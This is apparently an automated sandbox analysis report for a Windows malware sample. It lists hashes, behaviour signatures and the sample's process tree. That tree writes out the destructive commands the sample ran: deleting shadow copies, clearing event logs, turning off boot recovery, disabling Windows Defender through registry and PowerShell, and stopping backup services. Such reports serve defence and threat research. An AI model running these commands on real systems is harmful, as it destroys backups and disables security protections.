Resubmissions

31-01-2022 12:20

220131-ph549ahga6 10

31-01-2022 12:00

220131-n6sndshahl 10

Analysis

  • max time kernel
    186s
  • max time network
    186s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    31-01-2022 12:20

Errors

Reason
Task went missing from backend

General

  • Target

    06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe

  • Size

    4.2MB

  • MD5

    4685e7981959356439fe0f5643d45450

  • SHA1

    88b7ef25b17528a464758aafa9e853477e391491

  • SHA256

    06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8

  • SHA512

    8aefb153e913544d1e83b98cc964f266e537bd962c44dc2142f33a4ddf356230bc2b10d713fa84c77a33a2a8003cf1ab143f44dee227d7832f5cbd516f94b56f

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies security service 2 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 6 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Checks SCSI registry key(s) 3 TTPs 7 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 3 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe
    "C:\Users\Admin\AppData\Local\Temp\06173ef5e0646e104caad18a0f849975dfcddf6c292edfa4c2980b8947502ac8.exe"
    1⤵
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3780
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2256
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
          PID:3488
      • C:\Windows\SYSTEM32\net.exe
        net.exe stop "SDRSVC" /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:912
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop "SDRSVC" /y
          3⤵
            PID:3140
        • C:\Windows\SYSTEM32\net.exe
          net.exe stop "SstpSvc" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3860
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "SstpSvc" /y
            3⤵
              PID:3444
          • C:\Windows\SYSTEM32\net.exe
            net.exe stop "UI0Detect" /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3532
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "UI0Detect" /y
              3⤵
                PID:2848
            • C:\Windows\SYSTEM32\net.exe
              net.exe stop "vmicvss" /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1456
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop "vmicvss" /y
                3⤵
                  PID:1420
              • C:\Windows\SYSTEM32\net.exe
                net.exe stop "VSS" /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2900
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "VSS" /y
                  3⤵
                    PID:2116
                • C:\Windows\SYSTEM32\net.exe
                  net.exe stop "wbengine" /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:704
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop "wbengine" /y
                    3⤵
                      PID:3232
                  • C:\Windows\SYSTEM32\net.exe
                    net.exe stop "WebClient" /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1348
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop "WebClient" /y
                      3⤵
                        PID:1196
                    • C:\Windows\SYSTEM32\net.exe
                      net.exe stop "UnistoreSvc_1350b" /y
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1428
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop "UnistoreSvc_1350b" /y
                        3⤵
                          PID:1856
                      • C:\Windows\SYSTEM32\sc.exe
                        sc.exe config "SamSs" start= disabled
                        2⤵
                          PID:2244
                        • C:\Windows\SYSTEM32\sc.exe
                          sc.exe config "SDRSVC" start= disabled
                          2⤵
                            PID:1384
                          • C:\Windows\SYSTEM32\sc.exe
                            sc.exe config "SstpSvc" start= disabled
                            2⤵
                              PID:1532
                            • C:\Windows\SYSTEM32\sc.exe
                              sc.exe config "UI0Detect" start= disabled
                              2⤵
                                PID:1836
                              • C:\Windows\SYSTEM32\sc.exe
                                sc.exe config "vmicvss" start= disabled
                                2⤵
                                  PID:3588
                                • C:\Windows\SYSTEM32\sc.exe
                                  sc.exe config "VSS" start= disabled
                                  2⤵
                                    PID:2024
                                  • C:\Windows\SYSTEM32\sc.exe
                                    sc.exe config "wbengine" start= disabled
                                    2⤵
                                      PID:3040
                                    • C:\Windows\SYSTEM32\sc.exe
                                      sc.exe config "WebClient" start= disabled
                                      2⤵
                                        PID:2484
                                      • C:\Windows\SYSTEM32\sc.exe
                                        sc.exe config "UnistoreSvc_1350b" start= disabled
                                        2⤵
                                          PID:3320
                                        • C:\Windows\SYSTEM32\reg.exe
                                          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                          2⤵
                                            PID:3808
                                          • C:\Windows\SYSTEM32\reg.exe
                                            reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                            2⤵
                                              PID:2808
                                            • C:\Windows\SYSTEM32\reg.exe
                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                              2⤵
                                                PID:1048
                                              • C:\Windows\SYSTEM32\reg.exe
                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                2⤵
                                                  PID:1676
                                                • C:\Windows\SYSTEM32\reg.exe
                                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                  2⤵
                                                    PID:956
                                                  • C:\Windows\SYSTEM32\reg.exe
                                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                    2⤵
                                                      PID:3512
                                                    • C:\Windows\SYSTEM32\reg.exe
                                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                      2⤵
                                                        PID:2176
                                                      • C:\Windows\SYSTEM32\reg.exe
                                                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                        2⤵
                                                          PID:1296
                                                        • C:\Windows\SYSTEM32\reg.exe
                                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                          2⤵
                                                            PID:3828
                                                          • C:\Windows\SYSTEM32\reg.exe
                                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                              PID:2868
                                                            • C:\Windows\SYSTEM32\reg.exe
                                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                              2⤵
                                                                PID:2092
                                                              • C:\Windows\SYSTEM32\reg.exe
                                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                2⤵
                                                                  PID:1204
                                                                • C:\Windows\SYSTEM32\reg.exe
                                                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                  2⤵
                                                                    PID:3364
                                                                  • C:\Windows\SYSTEM32\reg.exe
                                                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                    2⤵
                                                                      PID:876
                                                                    • C:\Windows\SYSTEM32\reg.exe
                                                                      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                      2⤵
                                                                        PID:3264
                                                                      • C:\Windows\SYSTEM32\reg.exe
                                                                        reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                        2⤵
                                                                          PID:1556
                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                          schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                          2⤵
                                                                            PID:1096
                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                            2⤵
                                                                              PID:1056
                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                              2⤵
                                                                                PID:1268
                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                2⤵
                                                                                  PID:1100
                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                  2⤵
                                                                                    PID:1856
                                                                                  • C:\Windows\SYSTEM32\reg.exe
                                                                                    reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                    2⤵
                                                                                      PID:1604
                                                                                    • C:\Windows\SYSTEM32\reg.exe
                                                                                      reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                                      2⤵
                                                                                        PID:1608
                                                                                      • C:\Windows\SYSTEM32\reg.exe
                                                                                        reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                        2⤵
                                                                                          PID:2020
                                                                                        • C:\Windows\SYSTEM32\reg.exe
                                                                                          reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                          2⤵
                                                                                          • Modifies registry class
                                                                                          PID:2084
                                                                                        • C:\Windows\SYSTEM32\reg.exe
                                                                                          reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                          2⤵
                                                                                          • Modifies registry class
                                                                                          PID:3228
                                                                                        • C:\Windows\SYSTEM32\reg.exe
                                                                                          reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                          2⤵
                                                                                          • Modifies registry class
                                                                                          PID:3028
                                                                                        • C:\Windows\SYSTEM32\reg.exe
                                                                                          reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                          2⤵
                                                                                            PID:4052
                                                                                          • C:\Windows\SYSTEM32\reg.exe
                                                                                            reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                            2⤵
                                                                                              PID:1448
                                                                                            • C:\Windows\SYSTEM32\reg.exe
                                                                                              reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                              2⤵
                                                                                                PID:8
                                                                                              • C:\Windows\SYSTEM32\reg.exe
                                                                                                reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                2⤵
                                                                                                  PID:3608
                                                                                                • C:\Windows\SYSTEM32\reg.exe
                                                                                                  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                  2⤵
                                                                                                  • Modifies security service
                                                                                                  PID:2204
                                                                                                • C:\Windows\SYSTEM32\reg.exe
                                                                                                  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                  2⤵
                                                                                                    PID:3932
                                                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                    vssadmin.exe delete shadows /all /quiet
                                                                                                    2⤵
                                                                                                    • Interacts with shadow copies
                                                                                                    PID:2008
                                                                                                  • C:\Windows\SYSTEM32\wevtutil.exe
                                                                                                    wevtutil.exe cl system
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3816
                                                                                                  • C:\Windows\SYSTEM32\wevtutil.exe
                                                                                                    wevtutil.exe cl security
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:648
                                                                                                  • C:\Windows\SYSTEM32\wevtutil.exe
                                                                                                    wevtutil.exe cl application
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2848
                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                    wmic.exe SHADOWCOPY /nointeractive
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1460
                                                                                                  • C:\Windows\System32\Wbem\wmic.exe
                                                                                                    wmic.exe shadowcopy delete
                                                                                                    2⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:2712
                                                                                                  • C:\Windows\SYSTEM32\bcdedit.exe
                                                                                                    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                    2⤵
                                                                                                    • Modifies boot configuration data using bcdedit
                                                                                                    PID:1480
                                                                                                  • C:\Windows\SYSTEM32\bcdedit.exe
                                                                                                    bcdedit.exe /set {default} recoveryenabled no
                                                                                                    2⤵
                                                                                                    • Modifies boot configuration data using bcdedit
                                                                                                    PID:1800
                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                    cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                    2⤵
                                                                                                      PID:3212
                                                                                                      • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                        "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                        3⤵
                                                                                                        • Deletes Windows Defender Definitions
                                                                                                        PID:3888
                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                      cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                      2⤵
                                                                                                        PID:2200
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                          3⤵
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:3560
                                                                                                      • C:\Windows\SYSTEM32\cmd.exe
                                                                                                        cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                        2⤵
                                                                                                          PID:3268
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                            3⤵
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:1696
                                                                                                      • C:\Windows\system32\taskmgr.exe
                                                                                                        "C:\Windows\system32\taskmgr.exe" /4
                                                                                                        1⤵
                                                                                                        • Drops file in Windows directory
                                                                                                        • Checks SCSI registry key(s)
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:964
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                                        1⤵
                                                                                                        • Enumerates system info in registry
                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        PID:3888
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ff96ef34f50,0x7ff96ef34f60,0x7ff96ef34f70
                                                                                                          2⤵
                                                                                                            PID:2316
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1540 /prefetch:2
                                                                                                            2⤵
                                                                                                              PID:3440
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1752 /prefetch:8
                                                                                                              2⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:2348
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2180 /prefetch:8
                                                                                                              2⤵
                                                                                                                PID:3532
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2708 /prefetch:1
                                                                                                                2⤵
                                                                                                                  PID:1384
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2696 /prefetch:1
                                                                                                                  2⤵
                                                                                                                    PID:2244
                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1528,17417055853907971428,5810439352338047793,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3616 /prefetch:1
                                                                                                                    2⤵
                                                                                                                      PID:1188
                                                                                                                  • C:\Windows\ImmersiveControlPanel\SystemSettings.exe
                                                                                                                    "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
                                                                                                                    1⤵
                                                                                                                    • Drops file in Windows directory
                                                                                                                    • Checks SCSI registry key(s)
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:3992
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe"
                                                                                                                    1⤵
                                                                                                                      PID:2348
                                                                                                                    • C:\Windows\System32\rundll32.exe
                                                                                                                      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                      1⤵
                                                                                                                        PID:928
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        "C:\Windows\system32\cmd.exe"
                                                                                                                        1⤵
                                                                                                                          PID:2956
                                                                                                                        • C:\Windows\system32\LogonUI.exe
                                                                                                                          "LogonUI.exe" /flags:0x0 /state0:0xa3a89055 /state1:0x41c64e6d
                                                                                                                          1⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:2964

                                                                                                                        Network

                                                                                                                        MITRE ATT&CK Enterprise v6

                                                                                                                        Replay Monitor

                                                                                                                        Loading Replay Monitor...

                                                                                                                        Downloads

                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                          MD5

                                                                                                                          8592ba100a78835a6b94d5949e13dfc1

                                                                                                                          SHA1

                                                                                                                          63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                                                                                                          SHA256

                                                                                                                          fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                                                                                                          SHA512

                                                                                                                          87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                          MD5

                                                                                                                          d4238b7043cfe607fce1f0452336e06a

                                                                                                                          SHA1

                                                                                                                          8add55b7e540ffdb705fc577de15a9d7820e5b5a

                                                                                                                          SHA256

                                                                                                                          2226becc8623691d75ff4f9085951af7402174717b4a58a5cd8ce5bd534c5d97

                                                                                                                          SHA512

                                                                                                                          adaa3f99986f128a91fa7a5b46646e6db0c8f3f2d5f5c2783258a0c16f6c3bf5a833a1802e7f532cf64a6b68ee85cf8ad42808a846d220d4f2a5b6a2dcdc9562

                                                                                                                        • \??\pipe\crashpad_3888_KSVQANKZMNVTRCGE

                                                                                                                          MD5

                                                                                                                          d41d8cd98f00b204e9800998ecf8427e

                                                                                                                          SHA1

                                                                                                                          da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                          SHA256

                                                                                                                          e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                          SHA512

                                                                                                                          cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                        • memory/1696-171-0x0000024B26C20000-0x0000024B26CEA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          808KB

                                                                                                                        • memory/1696-170-0x0000024B26C20000-0x0000024B26CEA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          808KB

                                                                                                                        • memory/1696-172-0x0000024B26C20000-0x0000024B26CEA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          808KB

                                                                                                                        • memory/3560-120-0x0000022EDEE50000-0x0000022EDEE72000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/3560-125-0x0000022EE10E0000-0x0000022EE1156000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          472KB

                                                                                                                        • memory/3560-127-0x0000022EDEF03000-0x0000022EDEF05000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/3560-126-0x0000022EDEF00000-0x0000022EDEF02000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/3560-152-0x0000022EDEF06000-0x0000022EDEF08000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8KB